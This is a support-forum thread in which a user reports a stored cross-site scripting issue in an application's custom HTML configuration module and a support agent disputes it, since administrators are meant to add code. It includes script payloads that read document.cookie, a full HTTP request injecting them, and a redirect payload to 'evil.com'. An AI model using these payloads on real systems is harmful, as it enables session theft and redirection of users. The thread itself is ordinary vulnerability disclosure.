Stored Cross-Site Scripting (XSS) in configuration/custom_html

[Toxi4]

Hey!

I found an xss vulnerability in the configuration/custom_html module.
In the functionality of adding custom HTML code at the CFG[CUSTOM_HTML_HEAD] and CFG[CUSTOM_HTML_BODY] parameters.

Payload: <script>alert('text'%2bdocument.cookie)</script>

Request:

Code: Select all

POST /index.php?module=configuration/save&redirect_to=configuration/custom_html HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

form_session_token=DGIbpSzqgS&CFG[CUSTOM_HTML_HEAD]=<script>alert('head'%2bdocument.cookie)</script>&CFG[CUSTOM_HTML_BODY]=<script>alert('body'%2bdocument.cookie)</script>

The payload can be triggered on any page of all users.

Through this vulnerability, attacker can steal the sessions of all users of the system or redirect them to the attacker’s website. But to exploit this vulnerability attacker needs admin's access.

[support]

Anton, this is not vulnerability. As administrator you can add own php/js/html code for app. This is not bug or vulnerability.

[Toxi4]

I can't agree with you. Even if the application has functionality for adding HTML/PHP/JS code, it is still necessary to filter out potentially dangerous functions.

I don’t think that your users will be happy if they are redirected to a malicious site after logging in.

Code: Select all

"/><script>location.replace("https://evil.com")</script>

Or if an unscrupulous administrator decides to steal the cookies of all users and enter to their personal accounts.

[support]

But you are admin and app allows you add any code. It's all your responsibility.
Vulnerability - if not admin user can add something like this.